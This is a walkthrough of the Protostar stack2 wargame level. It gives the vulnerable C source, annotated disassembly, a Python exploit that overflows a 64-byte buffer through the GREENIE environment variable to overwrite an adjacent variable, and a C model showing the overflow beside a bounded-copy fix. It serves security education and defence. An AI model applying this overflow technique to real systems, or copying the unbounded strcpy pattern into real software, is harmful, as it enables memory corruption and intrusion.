Binary Exploitation Protostar Stack2 - Walkthrough - Writeup

Hello Guyz,




In this post, I am going to show you how to complete the Protostar stack2 level. Today's tutorial focuses on variable overwriting and environment variable manipulation: we will learn how an environment variable can serve as a bridge onto the stack, so that the value of a variable stored there can be overwritten while the program is running.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.


Source Code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* declares errx(); the original listing omits this header */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  /* unbounded copy: a GREENIE value longer than 64 bytes runs past
     buffer and into modified, which is what this level exploits */
  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

  return 0;
}



Hint provided by Exploit Exercises

Stack2 looks at environment variables, and how they can be set.

This level is at /opt/protostar/bin/stack2


Stack

0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Injectable Area                                      | modified | 
 ============================================================================================



Disassembly of main

Dump of assembler code for function main:
   0x08048494 <+0>: push   ebp
   0x08048495 <+1>: mov    ebp,esp
   0x08048497 <+3>: and    esp,0xfffffff0
   0x0804849a <+6>: sub    esp,0x60                            << ==== 0x60 = 96 bytes of stack reserved for the locals
   0x0804849d <+9>: mov    DWORD PTR [esp],0x80485e0           << ==== argument for getenv: pointer to the "GREENIE" string
   0x080484a4 <+16>: call   0x804837c <getenv@plt>          << ==== call getenv
   0x080484a9 <+21>: mov    DWORD PTR [esp+0x5c],eax        << ==== store the returned pointer in variable ([esp+0x5c])
   0x080484ad <+25>: cmp    DWORD PTR [esp+0x5c],0x0        << ==== variable == NULL ?
   0x080484b2 <+30>: jne    0x80484c8 <main+52>             << ==== if GREENIE was set, skip the errx call
   0x080484b4 <+32>: mov    DWORD PTR [esp+0x4],0x80485e8   << ==== otherwise errx(1, "please set the GREENIE ...")
   0x080484bc <+40>: mov    DWORD PTR [esp],0x1
   0x080484c3 <+47>: call   0x80483bc <errx@plt>
   0x080484c8 <+52>: mov    DWORD PTR [esp+0x58],0x0        << ==== modified = 0 (modified lives at [esp+0x58])
   0x080484d0 <+60>: mov    eax,DWORD PTR [esp+0x5c]        << ==== load variable (pointer to GREENIE's value) into EAX
   0x080484d4 <+64>: mov    DWORD PTR [esp+0x4],eax         << ==== second strcpy argument: source = variable
   0x080484d8 <+68>: lea    eax,[esp+0x18]                  << ==== address of buffer ([esp+0x18], 64 bytes below modified)
   0x080484dc <+72>: mov    DWORD PTR [esp],eax             << ==== first strcpy argument: destination = buffer
   0x080484df <+75>: call   0x804839c <strcpy@plt>          << ==== strcpy(buffer, variable): no length check
   0x080484e4 <+80>: mov    eax,DWORD PTR [esp+0x58]        << ==== reload modified
   0x080484e8 <+84>: cmp    eax,0xd0a0d0a                   << ==== modified == 0x0d0a0d0a ?
   0x080484ed <+89>: jne    0x80484fd <main+105>            << ==== not equal: jump to the "Try again" branch
   0x080484ef <+91>: mov    DWORD PTR [esp],0x8048618       << ==== puts("you have correctly modified the variable")
   0x080484f6 <+98>: call   0x80483cc <puts@plt>
   0x080484fb <+103>: jmp    0x8048512 <main+126>
   0x080484fd <+105>: mov    edx,DWORD PTR [esp+0x58]       << ==== printf("Try again, you got 0x%08x\n", modified)
   0x08048501 <+109>: mov    eax,0x8048641
   0x08048506 <+114>: mov    DWORD PTR [esp+0x4],edx
   0x0804850a <+118>: mov    DWORD PTR [esp],eax
   0x0804850d <+121>: call   0x80483ac <printf@plt>
   0x08048512 <+126>: leave
   0x08048513 <+127>: ret


Exploit

#!/usr/bin/python
# -*- coding:utf-8 -*-
# Protostar stack2: overwrite `modified` through the GREENIE environment
# variable (written for the Python 2 interpreter on the Protostar VM).

import os
import struct

# buffer starts at [esp+0x18] and is 64 bytes long; modified sits right
# after it at [esp+0x58], so 64 bytes of filler reach it exactly
padding = 'A' * 64                       # 0x41 = 'A'

# the value main() compares against, packed little-endian so the bytes
# land in memory as 0a 0d 0a 0d (i.e. in reverse order)
target = struct.pack('<I', 0x0d0a0d0a)

payload = padding + target               # 68 bytes in total

# strcpy() copies GREENIE straight into buffer, so the environment
# variable is the injection vector
os.environ['GREENIE'] = payload

# run the level with the crafted environment
os.system('./bin/stack2')
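The level works only because buffer and modified are adjacent on the stack and strcpy has no bound. The C program below is an added example, not code from the original writeup or from Protostar: it models that frame with a struct, reproduces the overwrite with the same 68-byte GREENIE value, and shows the bounded-copy fix beside it. It assumes a little-endian host (as the Protostar x86 VM is); the names frame_t, build_greenie, run_vulnerable and run_hardened are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define BUF_LEN 64
#define TARGET  0x0d0a0d0aU

/* Model of the stack2 frame: buffer directly followed by modified ([esp+0x18], [esp+0x58]). */
typedef struct { char buffer[BUF_LEN]; uint32_t modified; } frame_t;

/* Constructed test input: 64 filler bytes then 0x0d0a0d0a in little-endian
   byte order, the value the writeup puts in GREENIE. Returns its length. */
size_t build_greenie(char *out, size_t outlen) {
    if (outlen < BUF_LEN + 5) return 0;
    memset(out, 'A', BUF_LEN);
    for (int i = 0; i < 4; i++)
        out[BUF_LEN + i] = (char)((TARGET >> (8 * i)) & 0xff);
    out[BUF_LEN + 4] = '\0';
    return BUF_LEN + 4;
}

/* Vulnerable form: unbounded copy, as strcpy does in stack2. It writes through the
   frame's raw bytes (clamped to the frame size) so the overrun lands on modified. */
uint32_t run_vulnerable(const char *value) {
    frame_t f = { .modified = 0 };
    size_t n = strlen(value) + 1;
    if (n > sizeof f) n = sizeof f;
    memcpy((unsigned char *)&f, value, n);
    return f.modified;
}

/* Hardened form: reject a value that does not fit together with its NUL and
   copy with an explicit bound. Returns 0 if accepted, -1 if rejected. */
int run_hardened(const char *value, uint32_t *modified_out) {
    frame_t f = { .modified = 0 };
    size_t n = strlen(value);
    *modified_out = f.modified;            /* stays 0 on the rejection path */
    if (n >= BUF_LEN) return -1;
    memcpy(f.buffer, value, n + 1);
    *modified_out = f.modified;            /* still 0: the copy cannot reach it */
    return 0;
}
int main(void) {
    char greenie[72];
    uint32_t m = 0;
    build_greenie(greenie, sizeof greenie);
    int rc = run_hardened(greenie, &m);
    printf("vulnerable: modified=0x%08x | hardened: rc=%d modified=0x%08x\n",
           run_vulnerable(greenie), rc, m);
}
```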





Another Victory! Yeah


For a more detailed walkthrough, check the YouTube video playlist provided below.


